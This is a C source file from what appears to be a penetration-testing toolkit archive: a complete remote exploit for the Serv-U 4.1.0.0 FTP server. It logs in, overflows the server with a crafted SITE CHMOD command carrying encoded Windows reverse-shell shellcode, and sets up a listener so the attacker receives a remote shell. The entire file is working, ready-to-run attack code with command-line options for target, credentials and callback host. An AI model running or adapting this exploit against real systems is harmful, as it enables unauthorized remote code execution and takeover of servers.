home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / servu / servu-ftp.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  7KB  |  310 lines

  1. /*
  2. date: 25 janv 2004
  3. software: Serv-U 4.1.0.0 (prolly others)
  4. vendor: RhinoSoft, http://www.serv-u.com/
  5. credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
  6. greets: rosecurity team, int3liban
  7. notes: should work on any NT, reverse bindshell, terminates the process
  8. properly handle directories
  9. author: mandragore, sploiting@mandragore.solidshells.com
  10.  
  11. cheap changelog:
  12. 27 jan 2004 improved banners handling (select()'s), 
  13. added listener,
  14. default ip gathering (needs ifconfig & gawk)
  15.  
  16. */
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20. #include <sys/types.h>
  21. #include <sys/socket.h>
  22. #include <netinet/in.h>
  23. #include <arpa/inet.h>
  24. #include <unistd.h>
  25. #include <netdb.h>
  26. #include <fcntl.h>
  27. #include <unistd.h>
  28. #include <signal.h>
  29.  
  30. #define fatal(x) { perror(x); exit(1); }
  31.  
  32. unsigned char sc[]={
  33. // reverse bindshell, 204 bytes, uses import table
  34. 0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
  35. 0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
  36. 0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
  37. 0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
  38. 0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
  39. 0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
  40. 0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
  41. 0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
  42. 0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
  43. 0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
  44. 0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
  45. 0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
  46. 0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
  47. };
  48.  
  49. char *user="anonymous";
  50. char *pass="not@for.you";
  51. char *path="/incoming";
  52.  
  53. int s, ret;
  54. char *buff;
  55. int verbose=0;
  56. struct sockaddr_in saddr;
  57. int lhost, lport=8888;
  58.  
  59. void usage(char *argv0) {
  60. printf("usage: %s -d <ip_dest> [options]\n",argv0);
  61. printf("options:\n");
  62. printf(" -d target ip\n");
  63. printf(" -p target port (default 21)\n");
  64. printf(" -u username to log with (default %s)\n",user);
  65. printf(" -s password to log with (default %s)\n",pass);
  66. printf(" -w writable directory (default %s)\n",path);
  67. printf(" -H listening host (default %s)\n", \
  68. inet_ntoa(*(struct in_addr *)&lhost));
  69. printf(" -P listening port on host (default %d)\n",lport);
  70. printf(" -v verbose (set to 1 to enable)\n");
  71. printf("\n");
  72. exit(1);
  73. }
  74.  
  75. void reads() {
  76. fd_set fds;
  77. struct timeval tv;
  78.  
  79. __next:
  80. ret=recv(s,buff,4095,0);
  81. memset(buff+ret,0,1);
  82. if (verbose) printf("%s",buff);
  83.  
  84. FD_ZERO(&fds);
  85. FD_SET(s,&fds);
  86. tv.tv_sec = 1; tv.tv_usec = 0;
  87. if (select(s+1, &fds, NULL, NULL, &tv)!=0)
  88. goto __next;
  89. }
  90.  
  91. int getip() {
  92. char buff[17]="";
  93. FILE *f;
  94.  
  95. f=popen("echo -n `/sbin/ifconfig|grep Bcast|" \
  96. "gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`","r");
  97. fgets(buff,16,f);
  98. pclose(f);
  99.  
  100. return inet_addr(buff);
  101. }
  102.  
  103. void callback(int port) {
  104. fd_set fds;
  105. int s_len=sizeof(saddr);
  106. int sn;
  107.  
  108. buff=(char *)malloc(4096);
  109.  
  110. saddr.sin_family = AF_INET;
  111. saddr.sin_addr.s_addr = 0;
  112. saddr.sin_port = htons(port);
  113. printf("[.] setting up listener on port %d..\n",port);
  114. s=socket(2,1,6);
  115. ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr));
  116. if (ret==-1) {
  117. // we don't want to crash servu if not needed
  118. perror("[-] shell.bind");
  119. kill(getppid(),SIGUSR1);
  120. exit(1);
  121. }
  122. listen(s,1);
  123. sn=accept(s,(struct sockaddr *)&saddr,&s_len);
  124. printf("[+] got connection from %s, entering shell..\n", \
  125. inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr));
  126.  
  127. while(1) {
  128. FD_ZERO(&fds);
  129. FD_SET(0,&fds);
  130. FD_SET(sn,&fds);
  131.  
  132. if (select(sn+1, &fds, NULL, NULL, NULL) < 0)
  133. fatal("[-] shell.select ");
  134.  
  135. if (FD_ISSET(0,&fds)) {
  136. ret = read(1,buff,4096);
  137. send(sn,buff,ret,0);
  138. }
  139.  
  140. if (FD_ISSET(sn,&fds)) {
  141. if ( (ret=recv(sn,buff,4096,0)) < 1 )
  142. fatal("[-] shell.recv");
  143. write(1,buff,ret);
  144. }
  145.  
  146. }
  147.  
  148. }
  149.  
  150. void killchild() {
  151. printf("[-] got signal from parent, exiting.\n");
  152. exit(1);
  153. }
  154.  
  155. void killmain() {
  156. printf("[-] got signal from child, exiting.\n");
  157. exit(1);
  158. }
  159.  
  160. int main(int argc, char **argv) {
  161. short port=21;
  162. int target=0;
  163. int i, pid;
  164.  
  165. int delta=423;
  166. int callebx=0x10077A92; // libeay32.dll
  167. char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
  168. char chmod[]="SITE CHMOD 777 ";
  169.  
  170. printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");
  171.  
  172. lhost=getip();
  173.  
  174. if (argc<2)
  175. usage(argv[0]);
  176.  
  177. while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
  178. switch (i) {
  179. case 'd':
  180. target=inet_addr(optarg);
  181. break;
  182. case 'p':
  183. port=atoi(optarg);
  184. break;
  185. case 'u':
  186. user=optarg;
  187. break;
  188. case 's':
  189. pass=optarg;
  190. break;
  191. case 'w':
  192. path=optarg;
  193. break;
  194. case 'H':
  195. lhost=inet_addr(optarg);
  196. break;
  197. case 'P':
  198. lport=atoi(optarg);
  199. break;
  200. case 'v':
  201. verbose=atoi(optarg);
  202. break;
  203. default:
  204. usage(argv[0]);
  205. break;
  206. }
  207. }
  208.  
  209. if ((target==-1) || (lhost==-1) || (lhost==0))
  210. usage(argv[0]);
  211.  
  212. printf("[.] if working you'll have a shell on %s:%d.\n", \
  213. inet_ntoa(*(struct in_addr *)&lhost),lport);
  214. printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
  215. user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
  216.  
  217. pid=fork();
  218. switch(pid) {
  219. case 0:
  220. signal(SIGUSR1,killchild);
  221. callback(lport);
  222. break;
  223. default:
  224. signal(SIGUSR1,killmain);
  225. break;
  226. }
  227.  
  228. lport=lport ^ 0x9696;
  229. lport=(lport & 0xff) << 8 | lport >>8;
  230. memcpy(sc+0x5a,&lport,2);
  231.  
  232. lhost=lhost ^ 0x96969696;
  233. memcpy(sc+0x53,&lhost,4);
  234.  
  235. buff=(char *)malloc(4096);
  236.  
  237. saddr.sin_family = AF_INET;
  238. saddr.sin_addr.s_addr = target;
  239. saddr.sin_port = htons(port);
  240.  
  241. s=socket(2,1,6);
  242.  
  243. ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
  244. if (ret==-1) {
  245. kill(pid,SIGUSR1); sleep(1);
  246. fatal("[-] connect()");
  247. }
  248. reads();
  249.  
  250. sprintf(buff,"USER %s\r\n",user);
  251. if (verbose) printf("%s",buff);
  252. send(s,buff,strlen(buff),0);
  253.  
  254. reads();
  255.  
  256. sprintf(buff,"PASS %s\r\n",pass);
  257. if (verbose) printf("%s",buff);
  258. send(s,buff,strlen(buff),0);
  259.  
  260. reads();
  261.  
  262. if (strstr(buff,"230")==0) { 
  263. printf("[-] can't login\n"); 
  264. exit(1); 
  265. } else
  266. printf("[+] logged in.\n");
  267.  
  268. sprintf(buff,"CWD %s\r\n",path);
  269. if (verbose) printf("%s",buff);
  270. send(s,buff,strlen(buff),0);
  271.  
  272. reads();
  273.  
  274. // verify directory
  275. sprintf(buff,"PWD\r\n",path);
  276. send(s,buff,strlen(buff),0);
  277. ret=recv(s,buff,1024,0);
  278. memset(buff+ret,0,1);
  279. i=strstr(buff+5,"\x22")-buff-5;
  280. if (i!=1) i++; // trailing /
  281.  
  282. printf("[+] sending exploit..\n");
  283.  
  284. bzero(buff,4096);
  285. memset(buff,0x90,600);
  286. strcat(buff,"\r\n");
  287. delta-=i; // strlen(path);
  288. memcpy(buff,&chmod,strlen(chmod));
  289. memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
  290. memcpy(buff+delta-9,&jmpback,5+4);
  291. memcpy(buff+delta,&callebx,4);
  292.  
  293. send(s,buff,602,0);
  294.  
  295. ret=recv(s,buff,1024,0);
  296. if ((ret==0) || (ret==-1)) {
  297. kill(pid,SIGUSR1); sleep(1);
  298. sleep(1);
  299. fatal("[+] done");
  300. }
  301.  
  302. printf("[-] remote servu isn't vulnerable.\n");
  303. memset(buff+ret,0,1);
  304. printf("%s",buff);
  305.  
  306. close(s);
  307.  
  308. exit(0);
  309. }
  310.